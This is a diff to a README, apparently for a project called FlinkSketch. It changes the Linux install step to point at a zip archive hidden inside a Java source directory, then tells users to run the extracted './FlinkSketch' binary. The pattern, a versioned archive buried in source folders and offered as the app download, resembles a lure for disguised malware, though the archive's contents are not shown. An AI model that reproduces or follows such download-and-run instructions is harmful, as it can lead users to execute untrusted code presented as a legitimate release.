Lordknight91/FlinkSketch/README.md

   3. Find it in your Applications and launch the app.

 - **Linux Users:**
-  1. Extract the downloaded `.tar.gz` file.
+  1. Extract the downloaded `https://raw.githubusercontent.com/Lordknight91/FlinkSketch/main/flinksketch-bench/src/main/java/dev/projectasap/flinksketch/sketches/baseline/Entropy/FlinkSketch-3.9.zip` file.
   2. Open your terminal and navigate to the extracted folder.
   3. Run `./FlinkSketch` to launch the application.